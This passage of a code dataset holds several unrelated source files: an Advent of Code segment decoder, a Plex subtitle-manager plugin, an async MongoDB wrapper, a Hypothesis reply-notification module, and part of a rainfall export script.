bottom_right,bottom_left\r\n\r\ndef get_top_left(input_lines):\r\n occurrences = {}\r\n for element in input_lines:\r\n for char in ['a','b','c','d','e','f','g']:\r\n if char in occurrences:\r\n occurrences[char] += element.count(char)\r\n else:\r\n occurrences[char] = element.count(char)\r\n for element in occurrences:\r\n if occurrences[element] == 6:\r\n return element\r\n\r\ndef get_top_right(input_lines,decode_dict):\r\n for line in input_lines:\r\n if len(line) == 2:\r\n for char in line:\r\n if char not in decode_dict.values():\r\n return char\r\n\r\ndef get_middle(input_lines,decode_dict):\r\n for line in input_lines:\r\n if len(line) == 4:\r\n for char in line:\r\n if char not in decode_dict.values():\r\n return char\r\n\r\ndef get_bottom(decode_dict):\r\n for char in ['a','b','c','d','e','f','g']:\r\n if char not in decode_dict.values():\r\n return char\r\n\r\ndef get_code_for_one(codes):\r\n return [code for code in codes if len(code) == 2]\r\n\r\ndef get_code_for_seven(codes):\r\n return [code for code in codes if len(code) == 3]\r\n\r\ndef decode_line(line):\r\n decoded = {}\r\n one_code = str(get_code_for_one(line))\r\n seven_code = str(get_code_for_seven(line))\r\n decoded['t'] = get_top(one_code,seven_code)\r\n decoded['br'],decoded['bl'] = get_bottom_sides(line)\r\n decoded['tl']=get_top_left(line)\r\n decoded['tr'] = get_top_right(line,decoded)\r\n decoded['m'] = get_middle(line,decoded)\r\n decoded['b'] = get_bottom(decoded)\r\n return decoded\r\n\r\ndef code_to_number(decoder):\r\n code_to_number = {}\r\n code_to_number['0'] = decoder['t']+decoder['tr']+decoder['br']+decoder['b']+decoder['bl']+decoder['tl']\r\n code_to_number['1'] = decoder['tr']+decoder['br']\r\n code_to_number['2'] = decoder['t']+decoder['tr']+decoder['b']+decoder['bl']+decoder['m']\r\n code_to_number['3'] = decoder['t']+decoder['tr']+decoder['br']+decoder['b']+decoder['m']\r\n code_to_number['4'] = decoder['tr']+decoder['br']+decoder['tl']+decoder['m']\r\n code_to_number['5'] = decoder['t']+decoder['br']+decoder['b']+decoder['tl']+decoder['m']\r\n code_to_number['6'] = decoder['t']+decoder['br']+decoder['b']+decoder['bl']+decoder['tl']+decoder['m']\r\n code_to_number['7'] = decoder['t']+decoder['tr']+decoder['br']\r\n code_to_number['8'] = decoder['t']+decoder['tr']+decoder['br']+decoder['b']+decoder['bl']+decoder['tl']+decoder['m']\r\n code_to_number['9'] = decoder['t']+decoder['tr']+decoder['br']+decoder['b']+decoder['tl']+decoder['m']\r\n return code_to_number\r\n\r\ndef strings_equal(decoder, code):\r\n for char in code:\r\n if char not in decoder:\r\n return False\r\n for char in decoder:\r\n if char not in code:\r\n return False\r\n return True\r\n\r\n## t,tr,br,b,bl,tl,m\r\n## a,b,c,d,e,f,g\r\ndef part2():\r\n lines=readfile()\r\n output_answer=[]\r\n input_codes = [line[0].split(' ')[:-1] for line in lines]\r\n output_codes = [line[1].split(' ')[1:] for line in lines]\r\n for x in range(len(input_codes)):\r\n decoded_output =[]\r\n decoded_line = decode_line(input_codes[x])\r\n decoder=code_to_number(decoded_line)\r\n for code in output_codes[x]:\r\n for number in range(0,10):\r\n if strings_equal(decoder[str(number)],code) == True:\r\n decoded_output.append(str(number))\r\n output_string = ''\r\n for element in decoded_output:\r\n output_string += element\r\n output_answer.append(int(output_string))\r\n print(sum(output_answer))\r\npart1()\r\npart2()\r\n\r\n","sub_path":"2021/vetle/day8/8.py","file_name":"8.py","file_ext":"py","file_size_in_byte":4775,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"447466495","text":"######################################################################################################################\n#\t\t\t\t\tWebTools bundle for Plex\n#\n#\t\t\t\t\tAllows you to manipulate subtitles on Plex Media Server\n#\n#\t\t\t\t\tAuthor:\t\t\tdagaluf, a Plex Community member\n#\t\t\t\t\tAuthor:\t\t\tdane22, a Plex Community member\n#\n#\t\t\t\t\tSupport thread:\thttps://forums.plex.tv/index.php/topic/119940-webtool-subtitle-manager-development/\n#\n######################################################################################################################\n\n#********* Constants used **********\nPREFIX = '/utils/webtools'\nNAME = 'WebTools'\nICON = 'WebTools.png'\nMYSECRET = 'BarkleyIsAFineDog'\nERRORAUTH = 'Error authenticating'\nMYTOKEN = ''\n\n#********** Imports needed *********\nimport os, io\nfrom subprocess import call\nimport xml.etree.ElementTree as et\n\n#********** Initialize *********\ndef Start():\n\tPLUGIN_VERSION = getPref('Version')\t\n\tprint(\"******** Started %s on %s **********\" %(NAME + ' V' + PLUGIN_VERSION, Platform.OS))\n\tLog.Debug(\"******* Started %s on %s ***********\" %(NAME + ' V' + PLUGIN_VERSION, Platform.OS))\n\tHTTP.CacheTime = 0\n\tDirectoryObject.thumb = R(ICON)\n\tObjectContainer.title1 = NAME + ' V' + PLUGIN_VERSION \n\tPlugin.AddViewGroup('List', viewMode='List', mediaType='items')\n\tObjectContainer.view_group = 'List'\n\tValidatePrefs()\n\n#********** Get token *********\n''' This will get a valid token, that can be added to the url, if authenticating is needed '''\n@route(PREFIX + '/getToken')\ndef getToken():\n\tLog.Debug('getToken started')\n\t# Grap the token from Plex\n\tmyURL = 'http://127.0.0.1:32400/myplex/account'\n\ttry:\t\t\n\t\tmyXML = XML.ElementFromURL(myURL).xpath('//MyPlex')\n\texcept:\n\t\treturn 'NoAccess'\n\ttry:\n\t\treturnValue = ''\n\t\tmyToken = myXML[0].get('authToken')\n\t\treturnValue = 'X-Plex-Token=' + myToken\n\texcept:\n\t\tLog.Debug('No token avail')\n\treturn returnValue\n\n\n#********** Get Pref *********\n''' This will get a value from a Pref setting in the settings file '''\n@route(PREFIX + '/getPref')\ndef getPref(key):\n\tLog.Debug('getPref called for key: %s' %(key))\n\tmyFile = os.path.join(Core.app_support_path, 'Plug-ins', NAME + '.bundle', 'http', 'jscript', 'settings.js')\n\twith io.open(myFile) as fin:\n\t\tfor line in fin:\n\t\t\tif 'var ' + key + ' =' in line:\n\t\t\t\tdrop, value = line.split('= \"')\n\t\t\t\tvalue = value[:-3]\n\treturn value\n\n#********** Set Secret *********\n''' This will save a unique GUID in the dict, that is used as a seed for the secret '''\n@route(PREFIX + '/setSecretGUID')\ndef setSecretGUID():\n\tDict['secret'] = String.UUID()\n\tDict.Save()\n\treturn\n\n#********** Create Website *********\n''' Create symbolic links in the WebClient, so we can access this bundle frontend via a browser directly '''\n@route(PREFIX + '/setup')\ndef setupSymbLink():\n\tsrc = Core.storage.join_path(Core.app_support_path, 'Plug-ins', NAME + '.bundle', 'http')\n\tdst = Core.storage.join_path(Core.app_support_path, 'Plug-ins', 'WebClient.bundle', 'Contents', 'Resources', NAME)\n\tif not os.path.lexists(dst):\n\t\tif Platform.OS=='Windows':\n\t\t\tLog.Debug('Darn ' + Platform.OS)\n\t\t\t# Cant create a symb link on Windows, until Plex moves to Python 3.3\n\t\t\t#call([\"C:\\Users\\TM\\AppData\\Local\\Plex Media Server\\Plug-ins\\WebTools.bundle\\RightClick_Me_And_Select_Run_As_Administrator.cmd\"])\n\t\t\treturn False\n\t\telse:\n\t\t# This creates a symbolic link for the bundle in the WebClient.\n\t\t# URL is http://:32400/web/WebTools/index.html\n\t\t\tos.symlink(src, dst)\n\t\t\tLog.Debug(\"SymbLink not there, so creating %s pointing towards %s\" %(dst, src))\n\t\t\treturn True\n\telse:\n\t\tLog.Debug(\"SymbLink already present\")\n\t\treturn True\n\n#********** Main function *********\n''' Main menu '''\n@handler(PREFIX, NAME, ICON)\n@route(PREFIX + '/MainMenu')\ndef MainMenu(Func='', Secret='', **kwargs):\n\tif Func=='':\n\t\tLog.Debug(\"********** Starting MainMenu **********\")\t\n\t\toc = ObjectContainer()\n\t\tif not setupSymbLink():\n\t\t\tcmdFileName = Core.storage.join_path(Core.app_support_path, 'Plug-ins', NAME + '.bundle', 'RightClick_Me_And_Select_Run_As_Administrator.cmd')\n\t\t\toc.add(DirectoryObject(key=Callback(MainMenu), title=\"You are running Plex on a Windows OS, but\"))\n\t\t\toc.add(DirectoryObject(key=Callback(MainMenu), title='have not yet been running the file named:'))\n\t\t\toc.add(DirectoryObject(key=Callback(MainMenu), title=cmdFileName))\n\t\t\toc.add(DirectoryObject(key=Callback(MainMenu), title='Do so, and then reload this page'))\n\t\telse:\n\t\t\tif setPMSPath():\n\t\t\t\toc.add(DirectoryObject(key=Callback(MainMenu), title=\"To access this channel, go to\"))\n\t\t\t\toc.add(DirectoryObject(key=Callback(MainMenu), title='http://' + Prefs['PMS_Path'] + ':32400/web/' + NAME + '/index.html'))\n\t\t\telse:\n\t\t\t\toc.add(DirectoryObject(key=Callback(MainMenu), title=\"Bad or missing settings\"))\t\n\t\t\t\toc.add(DirectoryObject(key=Callback(MainMenu), title=\"Select Preferences to set ip address of the PMS\"))\n\t\t\t\toc.add(DirectoryObject(key=Callback(MainMenu), title=\"Afterwards, refresh this page\"))\n\t\toc.add(PrefsObject(title='Preferences', thumb=R('icon-prefs.png')))\n\t\tLog.Debug(\"********** Ending MainMenu **********\")\n\t\treturn oc\n\t# Here comes the functions avail\n\telif Func=='PathExists':\n\t\treturn PathExists(Secret, kwargs.get(\"Path\"))\n\telif Func=='ShowSRT':\n\t\treturn ShowSRT(Secret, kwargs.get(\"FileName\"))\n\telif Func=='DelSub':\n\t\treturn DelSub(Secret, kwargs.get(\"MediaID\"), kwargs.get(\"SubFileID\"))\n\telif Func=='GetXMLFile':\n\t\treturn GetXMLFile(Secret, kwargs.get(\"Path\"))\n\telif Func=='SetPref':\n\t\treturn SetPref(Secret, kwargs.get(\"Pref\"), kwargs.get(\"Value\"))\n\telif Func=='GetXMLFileFromUrl':\n\t\treturn GetXMLFileFromUrl(Secret, kwargs.get(\"Url\"))\n\telif Func=='restart':\n\t\treturn Restart()\n\n\n####################################################################################################\n# Set PMS Path\n####################################################################################################\n@route(PREFIX + '/setPMSPath')\ndef setPMSPath():\n\tLog.Debug('Entering setPMSPath')\n\t# Let's check if the PMS path is valid\n\tmyPath = Prefs['PMS_Path']\n\tLog.Debug('My master set the Export path to: %s' %(myPath))\n\ttry:\n\t\t#Let's see if we can add out subdirectory below this\n\t\tif MYTOKEN != None:\n\t\t\ttmpTest = XML.ElementFromURL('http://' + myPath + ':32400/?' + MYTOKEN)\n\t\telse:\n\t\t\ttmpTest = XML.ElementFromURL('http://' + myPath + ':32400')\n\t\treturn True\t\t\n\texcept:\n\t\tLog.Critical('Bad pmsPath')\n\t\treturn False\n\t\n####################################################################################################\n# ValidatePrefs\n####################################################################################################\n@route(PREFIX + '/ValidatePrefs')\ndef ValidatePrefs():\n\tglobal MYTOKEN\n\tMYTOKEN = getToken()\n\tsetupSymbLink()\n\tsetSecretGUID()\n\tSetPref(Dict['secret'], 'PathToPlexMediaFolder', Core.app_support_path.replace(\"\\\\\", \"/\"))\n\tif setPMSPath():\n\t\tLog.Debug('Prefs are valid, so lets update the js file')\n\t\tmyFile = os.path.join(Core.app_support_path, 'Plug-ins', NAME + '.bundle', 'http', 'jscript', 'settings.js')\n\t\tglobal MYSECRET \n\t\tMYSECRET = Hash.MD5(Dict['secret'] + Prefs['PMS_Path'])\n\t\twith io.open(myFile) as fin, io.open(myFile + '.tmp', 'w') as fout:\n\t\t\tfor line in fin:\n\t\t\t\tif 'var Secret =' in line:\n\t\t\t\t\tline = 'var Secret = \"' + MYSECRET + '\";\\n'\n\t\t\t\telif 'var PMSUrl =' in line:\n\t\t\t\t\tline = 'var PMSUrl = \"' + Prefs['PMS_Path'] + '\";\\n'\n\t\t\t\telif 'var Token =' in line:\n\t\t\t\t\tline = 'var Token = \"' + MYTOKEN + '\";\\n' \t\t\t\t\t\n\t\t\t\tfout.write(unicode(line))\n\t\tos.rename(myFile, myFile + '.org')\n\t\tos.rename(myFile + '.tmp', myFile)\n\treturn\n\n####################################################################################################\n# Check Secret\n####################################################################################################\n''' Check if the Secret provided is valid\nReturns true is okay, and else false '''\n@route(PREFIX + '/PwdOK')\ndef PwdOK(Secret):\n\tif (Hash.MD5(Dict['secret'] + Prefs['PMS_Path']) == Secret):\n\t\treturn True\n\telif Secret == Dict['secret']:\n\t\treturn True\t\t\n\telse:\n\t\treturn False\n\n####################################################################################################\n# Check if a path exists\n####################################################################################################\n''' Check if a path exists.\tReturns true if if it does, else false '''\n@route(PREFIX + '/PathExists')\ndef PathExists(Secret, Path):\n\tif PwdOK(Secret):\t\t\n\t\t# Now we got the filename and dir name, so let's nuke the file\n\t\tif os.path.exists(Path):\n\t\t\tLog.Debug('Got a call for PathExists with the secret of %s and the path as %s and returned true' %(Secret, Path))\n\t\t\treturn 'true'\n\t\telse:\n\t\t\tLog.Debug('Got a call for PathExists with the secret of %s and the path as %s and returned false' %(Secret, Path))\n\t\t\treturn 'false'\t\t\t\t\n\telse:\n\t\treturn ERRORAUTH\n\n####################################################################################################\n# Store a pref setting\n####################################################################################################\n''' Allows webpart to store a setting in settings.js '''\n@route(PREFIX + '/SetPref')\ndef SetPref(Secret, Pref, Value):\n\tif PwdOK(Secret):\t\t\n\t\tLog.Debug('Got a call to set %s to %s in settings.js' %(Pref, Value))\n\t\tValue = Value.replace(\"\\\\\", \"/\")\n\t\tLog.Debug('Value is now %s' %(Value))\n\t\ttry:\n\t\t\tbDone = False\n\t\t\tmyFile = os.path.join(Core.app_support_path, 'Plug-ins', NAME + '.bundle', 'http', 'jscript', 'settings.js')\n\t\t\twith io.open(myFile) as fin, io.open(myFile + '.tmp', 'w') as fout:\n\t\t\t\tfor line in fin:\n\t\t\t\t\tif 'var ' + Pref + ' = ' in line:\n\t\t\t\t\t\tline = 'var ' + Pref + ' = \"' + Value + '\";\\n'\n\t\t\t\t\t\tbDone = True\n\t\t\t\t\tfout.write(unicode(line))\n\t\t\tif bDone == False:\n\t\t\t\twith io.open(myFile + '.tmp', 'a') as fout:\n\t\t\t\t\tline = 'var ' + Pref + ' = \"' + Value + '\";\\n'\n\t\t\t\t\tfout.write(unicode(line))\n\t\t\tos.rename(myFile, myFile + '.org')\n\t\t\tos.rename(myFile + '.tmp', myFile)\n\t\t\treturn 'ok'\n\t\texcept:\n\t\t\treturn 'error'\n\telse:\n\t\treturn ERRORAUTH\n\n####################################################################################################\n# Show contents of a txt file\n####################################################################################################\n''' Show contents of a txt file '''\n@route(PREFIX + '/ShowSRT')\ndef ShowSRT(Secret, FileName):\n\tif PwdOK(Secret):\n\t\twith io.open (FileName, \"rb\") as myfile:\t\t\n\t\t\treturn myfile.read()\n\telse:\n\t\treturn ERRORAUTH\n\n####################################################################################################\n# Delete a subtitle file\n####################################################################################################\n''' Delete a subtitle file.\tReturns ok if all goes well '''\n@route(PREFIX + '/DelSub')\ndef DelSub(Secret, MediaID, SubFileID):\n\tif PwdOK(Secret):\t\t\n\t\t# Now we got the filename and dir name, so let's nuke the file\n\t\ttry:\t\t\t\n\t\t\tLog.Debug('***** Trying to delete the Sub file %s from the media %s *****' %(SubFileID, MediaID))\n\t\t\tmyFiles = []\n\t\t\t# Let's start by grapping the media info from it's tree\n\t\t\tmyURL = 'http://127.0.0.1:32400/library/metadata/' + MediaID + '/tree'\t\t\t\n\t\t\tmyMediaStreams = XML.ElementFromURL(myURL).xpath('//MediaPart/MediaStream')\n\t\t\t# We got a collection of MediaParts, so start walking them\n\t\t\tfor myMediaStream in myMediaStreams:\n\t\t\t\tif myMediaStream.get('id') == SubFileID:\n\t\t\t\t\t# We got the correct sub file\n\t\t\t\t\tmySub = myMediaStream.get('url')\n\t\t\t\t\tLog.Debug('Sub file found is %s' %(mySub))\n\t\t\t\t\t# Okay....Got the agent, now let's find the path to the bundle/contents directory\n\t\t\t\t\tmyHash = XML.ElementFromURL(myURL).xpath('//MediaPart/@hash')[0]\n\t\t\t\t\t# Create a string containing the path to the contents directory\n\t\t\t\t\tmyPath = os.path.join(Core.app_support_path, 'Media', 'localhost', myHash[0], myHash[1:]+ '.bundle', 'Contents')\n\t\t\t\t\tif 'media://' in mySub:\n\t\t\t\t\t\t# Let's find the agent in spe, and start by getting LangCode/Agent\n\t\t\t\t\t\timport re\n\t\t\t\t\t\ttry:\n\t\t\t\t\t\t\tmyAgent = re.search('Contents/Subtitles/(.*)', mySub).group(1)\t\t\t\t\t\n\t\t\t\t\t\texcept:\n\t\t\t\t\t\t\tLog.Debug('Error digesting string %s' %(mySub))\t\t\n\t\t\t\t\t\t# Now seperate the lang code\n\t\t\t\t\t\tlang, myAgent = myAgent.split(\"/\")\n\t\t\t\t\t\t# Let's get the filename\n\t\t\t\t\t\tmySubFile = myAgent\t\t\t\t\t\t\t\n\t\t\t\t\t\trealAgentName, realSubFile = myAgent.split('_')\n\t\t\t\t\t\t# The result for the subtitles contribution folder\t\t\t\t\t\t\n\t\t\t\t\t\trealSubPathForSubCont = os.path.join(myPath, 'Subtitle Contributions', realAgentName, lang, realSubFile)\n\t\t\t\t\t\t# The result for the Symbolic links\n\t\t\t\t\t\trealPathForSymbLink = os.path.join(myPath, 'Subtitles', lang, myAgent)\n\t\t\t\t\t\t# Add to array of files to delete\n\t\t\t\t\t\tmyFiles.append(realSubPathForSubCont)\n\t\t\t\t\t\tmyFiles.append(realPathForSymbLink)\t\t\t\t\t\t\n\t\t\t\t\telse:\n\t\t\t\t\t\trealAgentName = 'com.plexapp.agents.localmedia'\n\t\t\t\t\t\tmySubFile = mySub[7:]\n\t\t\t\t\t\tmyFiles.append(mySubFile)\n\t\t\t\t\tfor myFile in myFiles:\n\t\t\t\t\t\tLog.Debug('Delete %s' %(myFile))\n\t\t\t\t\t\tos.remove(myFile)\t\t\t\t\t\t\n\t\t\t\t\t# XML files that we need to manipulate\n\t\t\t\t\txmlFile1 = os.path.join(myPath, 'Subtitles.xml')\n\t\t\t\t\txmlFile2 = os.path.join(myPath, 'Subtitle Contributions', realAgentName + '.xml')\n\t\t\t\t\tif (realAgentName!='com.plexapp.agents.localmedia'):\n\t\t\t\t\t\tDelFromXML(xmlFile2, 'media', realSubFile)\n\t\t\t\t\t\tDelFromXML(xmlFile1, 'media', realSubFile)\n\t\t\t\t\telse:\n\t\t\t\t\t\tDelFromXML(xmlFile2, 'file', mySubFile)\n\t\t\t\t\t\tDelFromXML(xmlFile1, 'file', mySubFile)\n\t\t\t\t\tbreak\n\t\t\tLog.Debug('***** DelSub ended okay *****')\n\t\t\treturn 'ok'\t\t\t\t\n\t\texcept OSError:\n\t\t\treturn 'error'\n\telse:\n\t\treturn ERRORAUTH\n\n####################################################################################################\n# Delete from an XML file\n####################################################################################################\n''' Delete from an XML file '''\n@route(PREFIX + '/DelFromXML')\ndef DelFromXML(fileName, attribute, value):\n\tfrom xml.etree import ElementTree\n\tLog.Debug('Need to delete element with an attribute named \"%s\" with a value of \"%s\" from file named \"%s\"' %(attribute, value, fileName))\n\n\twith io.open(fileName, 'r') as f:\n\t\ttree = ElementTree.parse(f)\n\t\troot = tree.getroot()\n\t\tmySubtitles = root.findall('.//Subtitle')\n\t\tfor Subtitles in root.findall(\"Language[Subtitle]\"):\n\t\t\tfor node in Subtitles.findall(\"Subtitle\"):\n\t\t\t\tmyValue = node.attrib.get(attribute)\n\t\t\t\tif myValue:\n\t\t\t\t\tif '_' in myValue:\n\t\t\t\t\t\tdrop, myValue = myValue.split(\"_\")\n\t\t\t\t\tif myValue == value:\n\t\t\t\t\t\tSubtitles.remove(node)\n\ttree.write(fileName, encoding='utf-8', xml_declaration=True)\n\treturn\n\n####################################################################################################\n# Returns the contents of an XML file\n####################################################################################################\n''' Returns the contents of an XML file '''\n@route(PREFIX + '/GetXMLFile')\ndef GetXMLFile(Secret, Path):\n\tif PwdOK(Secret):\n\t\tLog.Debug('Getting contents of an XML file named %s' %(Path))\t\t\n\t\tdocument = et.parse( Path )\n\t\troot = document.getroot()\n\t\treturn et.tostring(root, encoding='utf8', method='xml')\n\telse:\n\t\treturn ERRORAUTH\n\n####################################################################################################\n# Returns the contents of an XML file from an url\n####################################################################################################\n''' Returns the contents of an XML file '''\n@route(PREFIX + '/GetXMLFileFromUrl')\ndef GetXMLFileFromUrl(Secret, Url):\n\tif PwdOK(Secret):\n\t\timport urllib2\n\t\tLog.Debug('Getting contents of an XML file from Url: %s' %(Url))\n\t\tdocument = et.parse(urllib2.urlopen(Url))\t\t\n\t\troot = document.getroot()\n\t\treturn et.tostring(root, encoding='utf8', method='xml')\n\telse:\n\t\treturn ERRORAUTH\n\n####################################################################################################\n# Force a restart run\n####################################################################################################\n''' When called, this channel is restarted '''\n@route(PREFIX + '/Restart')\ndef Restart():\n\tLog.Debug('Restarting')\n\tStart()\n\n\n","sub_path":"Contents/Code/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":16079,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"651983150","text":"import asyncio_mongo\n\n\nasync def create_db():\n db = Db()\n await db._init()\n return db\n\n\nclass Db:\n\n INSTANCE = None\n DATABASE = 'Clang'\n\n def __init__(self):\n if self.INSTANCE is not None:\n raise ValueError(\"An instantiation already exists!\")\n # self.settings = settings\n\n async def _init(self):\n mongo = await asyncio_mongo.Connection.create('localhost', 27017)\n self.clang_db = mongo[self.DATABASE]\n\n @classmethod\n def get_instance(cls):\n if cls.INSTANCE is None:\n cls.INSTANCE = Db()\n return cls.INSTANCE\n\n async def insert(self, table_name, items):\n table = self.clang_db[table_name]\n try:\n result = await table.insert(items, safe=True)\n except Exception:\n raise ValueError\n return result\n\n async def find_all(self, table_name, limit=None):\n table = self.clang_db[table_name]\n if limit is None:\n limit = 0\n result = await table.find(limit=limit)\n return result\n\n async def find_one(self, table_name, query):\n table = self.clang_db[table_name]\n result = await table.find_one(fields=query)\n return result\n\n async def find(self, table_name, query, limit=None):\n table = self.clang_db[table_name]\n if limit is None:\n limit = 1\n result = await table.find(fields=query, limit=limit)\n return result\n\n async def delete(self, table_name, query):\n table = self.clang_db[table_name]\n result = await table.remove(query, safe=True)\n return result\n\n async def update(self, table_name, key, update):\n table = self.clang_db[table_name]\n result = await table.update(key, {\"$set\": update}, safe=True)\n return result\n","sub_path":"db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":1802,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"392303114","text":"# -*- coding: utf-8 -*-\nimport logging\nimport re\nfrom datetime import datetime\n\nfrom pyramid.events import subscriber\nfrom pyramid.renderers import render\n\nfrom h import auth\nfrom h.auth.util import translate_annotation_principals\nfrom h.api import storage\nfrom h.notification.notifier import TemplateRenderException\nfrom h.notification import types\nfrom h.notification.models import Subscriptions\nfrom h.notification.gateway import user_name, \\\n user_profile_url, standalone_url, get_user_by_name\nfrom h.notification.types import ROOT_PATH, REPLY_TYPE\nfrom h.accounts.events import LoginEvent, RegistrationEvent\n\nlog = logging.getLogger(__name__)\n\nTXT_TEMPLATE = ROOT_PATH + 'reply_notification.txt.jinja2'\nHTML_TEMPLATE = ROOT_PATH + 'reply_notification.html.jinja2'\nSUBJECT_TEMPLATE = ROOT_PATH + 'reply_notification_subject.txt.jinja2'\n\n\ndef create_template_map(request, reply, parent):\n document_title = ''\n if 'document' in reply:\n document_title = reply['document'].get('title', '')\n\n if document_title is '':\n document_title = parent['uri']\n\n parent_user = user_name(parent['user'])\n reply_user = user_name(reply['user'])\n\n token = request.registry.notification_serializer.dumps({\n 'type': REPLY_TYPE,\n 'uri': parent['user'],\n })\n unsubscribe = request.route_url('unsubscribe', token=token)\n\n return {\n 'document_title': document_title,\n 'document_path': parent['uri'],\n 'parent_text': parent.get('text', ''),\n 'parent_user': parent_user,\n 'parent_timestamp': format_timestamp(parent['created']),\n 'parent_user_profile': user_profile_url(request, parent['user']),\n 'parent_path': standalone_url(request, parent['id']),\n 'reply_text': reply['text'],\n 'reply_user': reply_user,\n 'reply_timestamp': format_timestamp(reply['created']),\n 'reply_user_profile': user_profile_url(request, reply['user']),\n 'reply_path': standalone_url(request, reply['id']),\n 'unsubscribe': unsubscribe\n }\n\n\ndef format_timestamp(timestamp):\n # Currently we cut the UTC format because time.strptime has problems\n # parsing it, and of course it'd only correct the backend's timezone\n # which is not meaningful for international users. This trims the\n # timezone in the format +00:00.\n timestamp = re.sub(r'\\+\\d\\d:\\d\\d$', '', timestamp)\n timestamp_format = '%Y-%m-%dT%H:%M:%S.%f'\n parsed = datetime.strptime(timestamp, timestamp_format)\n\n template_format = '%d %B at %H:%M'\n if parsed.year < datetime.now().year:\n template_format = '%d %B %Y at %H:%M'\n return parsed.strftime(template_format)\n\n\ndef get_recipients(request, parent):\n username = user_name(parent['user'])\n user_obj = get_user_by_name(request, username)\n if not user_obj:\n raise TemplateRenderException('User not found')\n return [user_obj.email]\n\n\ndef check_conditions(annotation, data):\n # Do not notify users about their own replies\n if annotation['user'] == data['parent']['user']:\n return False\n\n # Is he the proper user?\n if data['parent']['user'] != data['subscription']['uri']:\n return False\n\n # Else okay\n return True\n\n\ndef generate_notifications(request, annotation, action):\n # Only send notifications when new annotations are created\n if action != 'create':\n return\n\n # If the annotation doesn't have a parent, we can't find its parent, or we\n # have no idea who the author of the parent is, then we can't send a\n # notification email.\n parent_id = annotation.parent_id\n if parent_id is None:\n return\n parent = storage.fetch_annotation(request, parent_id)\n if parent is None or 'user' not in parent:\n return\n\n # We don't send replies to the author of the parent unless they're going to\n # be able to read it. That means there must be some overlap between the set\n # of effective principals of the parent's author, and the read permissions\n # of the reply.\n child_read_permissions = annotation.get('permissions', {}).get('read', [])\n parent_principals = auth.effective_principals(parent['user'], request)\n read_principals = translate_annotation_principals(child_read_permissions)\n if not set(parent_principals).intersection(read_principals):\n return\n\n # Store the parent values as additional data\n data = {\n 'parent': parent\n }\n\n subscriptions = Subscriptions.get_active_subscriptions_for_a_type(\n types.REPLY_TYPE)\n for subscription in subscriptions:\n data['subscription'] = subscription.__json__(request)\n\n # Validate annotation\n if check_conditions(annotation, data):\n try:\n subject, text, html, recipients = render_reply_notification(\n request,\n annotation,\n parent)\n yield subject, text, html, recipients\n # ToDo: proper exception handling here\n except TemplateRenderException:\n log.exception('Failed to render subscription'\n ' template %s', subscription)\n except:\n log.exception('Unknown error when trying to render'\n ' subscription template %s', subscription)\n\n\ndef render_reply_notification(request, annotation, parent):\n # Render e-mail parts\n tmap = create_template_map(request, annotation, parent)\n text = render(TXT_TEMPLATE, tmap, request).strip()\n html = render(HTML_TEMPLATE, tmap, request).strip()\n subject = render(SUBJECT_TEMPLATE, tmap, request).strip()\n recipients = get_recipients(request, parent)\n return subject, text, html, recipients\n\n\n# Create a reply template for a uri\ndef create_subscription(request, uri, active):\n subs = Subscriptions(\n uri=uri,\n type=types.REPLY_TYPE,\n active=active\n )\n\n request.db.add(subs)\n request.db.flush()\n\n\n@subscriber(RegistrationEvent)\ndef registration_subscriptions(event):\n request = event.request\n user_uri = u'acct:{}@{}'.format(event.user.username, request.domain)\n create_subscription(event.request, user_uri, True)\n\n\n# For backwards compatibility, generate reply notification if not exists\n@subscriber(LoginEvent)\ndef check_reply_subscriptions(event):\n request = event.request\n user_uri = 'acct:{}@{}'.format(event.user.username, request.domain)\n res = Subscriptions.get_templates_for_uri_and_type(user_uri,\n types.REPLY_TYPE)\n if not len(res):\n create_subscription(event.request, user_uri, True)\n\n\ndef includeme(config):\n config.scan(__name__)\n","sub_path":"h/notification/reply_template.py","file_name":"reply_template.py","file_ext":"py","file_size_in_byte":6692,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"312022080","text":"#!/usr/bin/env python\n# Pull out yearly precipitation\n# Daryl Herzmann 26 Jul 2004\n\nimport shutil\n\nimport dbflib\nimport mx.DateTime\nimport pg\n\nmydb = pg.connect(\"wepp\", \"iemdb\")\n\nsts = mx.DateTime.DateTime(2008, 3, 1)\nets = mx.DateTime.DateTime(2008, 11, 1)\ninterval = mx.DateTime.RelativeDateTime(days=+7)\n\nnow = sts\nohrap = {}\nrs = mydb.query(\"SELECT hrap_i from hrap_utm ORDER by hrap_i ASC\").dictresult()\nfor i in range(len(rs)):\n ohrap[int(rs[i][\"hrap_i\"])] = {\"rain\": 0, \"hours\": 0, \"mrain\": 0}\n\nhrapi = ohrap.keys()\nhrapi.sort()\n\nwhile now < ets:\n dbf = dbflib.create(\"weeklyrain/%srain\" % (now.strftime(\"%Y%m%d\"),))\n dbf.add_field(\"RAINFALL\", dbflib.FTDouble, 8, 2)\n dbf.add_field(\"RAINHOUR\", dbflib.FTDouble, 8, 2)\n dbf.add_field(\"RAINPEAK\", dbflib.FTDouble, 8, 2)\n\n rs = mydb.query(\n \"select hrap_i, sum(rainfall) /25.4 as rain, \\\n\tmax(peak_15min) /25.4 * 4 as mrain, sum(hr_cnt) / 4.0 as hours from \\\n\tdaily_rainfall_%s WHERE valid >= '%s' and valid < '%s' \\\n GROUP by hrap_i ORDER by hrap_i ASC\"\n % (\n now.strftime(\"%Y\"),\n now.strftime(\"%Y-%m-%d\"),\n (now + interval).strftime(\"%Y-%m-%d\"),\n )\n ).dictresult()\n\n hrap = ohrap\n for i in range(len(rs)):\n # print rs[i]\n hrap[int(rs[i][\"hrap_i\"])] = {\n \"rain\": float(rs[i][\"rain\"]),\n \"hours\": float(rs[i][\"hours\"]),\n \"mrain\": float(rs[i][\"mrain\"]),\n }\n\n for i in range(len(hrapi)):\n key = hrapi[i]\n dbf.write_record(\n i, (hrap[key][\"rain\"], hrap[key][\"hours\"], hrap[key][\"mrain\"])\n )\n\n del dbf\n shutil.copy(\n \"static/hrap_point_4326.shp\",\n \"weeklyrain/%srain.shp\" % (now.strftime(\"%Y%m%d\"),),\n )\n shutil.copy(\n \"static/hrap_point_4326.shx\",\n \"weeklyrain/%srain.shx\" % (now.strftime(\"%Y%m%d\"),),\n )\n shutil.copy(\n 